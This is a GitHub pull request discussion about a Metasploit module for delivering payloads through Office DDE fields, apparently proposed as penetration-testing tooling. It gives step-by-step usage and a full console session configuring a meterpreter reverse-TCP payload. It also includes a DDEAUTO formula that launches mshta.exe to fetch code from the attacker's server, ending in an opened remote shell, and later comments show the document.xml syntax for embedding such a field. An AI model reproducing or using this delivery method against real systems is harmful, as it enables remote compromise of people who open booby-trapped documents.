
Office DDE WORD Payload Delivery Server #9120

Closed
wants to merge 3 commits into from

Conversation


@ghost ghost commented Oct 24, 2017

This module generates a Quick parts field formula to embed into MS docs for payload delivery

Notes

I would put this under the fileformat directory, although since I've been unable to generate a doc (if anyone could point me in the right direction, happy to) for delivery, and the module does not exploit any flaws, just "features", I figured atm it would qualify as a script.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/script/dde_delivery
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST
  • set LPORT
  • run
  • Verify the server starts properly and the Quick Parts field formula is correct
  • Open up an MS doc manually (unfortunately I haven't figured out how to generate one) and embed with CTRL+F9 & paste, OR go to INSERT > QUICK PARTS > FIELD > FORMULA (ENTER) & paste
  • Close the document, then reopen it; you should receive "office_dde_delivery - Delivering payload"
  • SHELL!

Example

msf > use exploit/windows/script/office_dde_delivery
msf exploit(office_dde_delivery) > show options

Module options (exploit/windows/script/office_dde_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(office_dde_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(office_dde_delivery) > set LHOST eth0
LHOST => 192.168.0.11
msf exploit(office_dde_delivery) > set LPORT 14313
LPORT => 14313
msf exploit(office_dde_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.11:14313
[*] Using URL: http://0.0.0.0:8080/D77nWOo
[*] Local IP: http://192.168.0.11:8080/D77nWOo
[*] Server started.
[*] Place the following DDE in an MS document:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.0.11:8080/D77nWOo"
msf exploit(office_dde_delivery) > [*] 192.168.0.12     office_dde_delivery - Delivering payload
[*] Sending stage (179267 bytes) to 192.168.0.12
[*] Meterpreter session 1 opened (192.168.0.11:14313 -> 192.168.0.12:51116) at 2017-10-24 08:32:40 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

@wvu
Contributor

wvu commented Oct 24, 2017

"Generate" might be a strong word. I'd take a look at @wchen-r7's work on macros. He has a series of templates that he uses. Perhaps you can use the same for DDE.

Take a look at exploit/multi/fileformat/office_word_macro.

@ghost
Author

ghost commented Oct 24, 2017

Will do.

@ghost
Author

ghost commented Oct 24, 2017

Just gotta figure out how to add <w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"</w:instrText> (example) after w:RSIDDEFAULT and <w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/> after bookmarkend in document.xml and will work..hm

@wchen-r7
Contributor

Oh yeah, if you are building an office doc, you can look at some of our examples. Thanks @wvu for pointing it out.

I built the macro exploit basically by creating a doc with Microsoft, and then I studied the format from there. Building a doc can be kind of complicated because there are a lot of files, and there are a lot of references you need to track, and Office doesn't really tell you what's wrong with your document. I recommend using this tool as your "debugger" for building a docx:
https://www.microsoft.com/en-us/download/details.aspx?id=30425

I hope this helps!

@ghost
Author

ghost commented Oct 25, 2017

Yes, it helps immensely, thank you :D. I might just go for what I saw with the inject_payload function in your module; just gotta figure out the syntax of the parser.

This pull request was closed.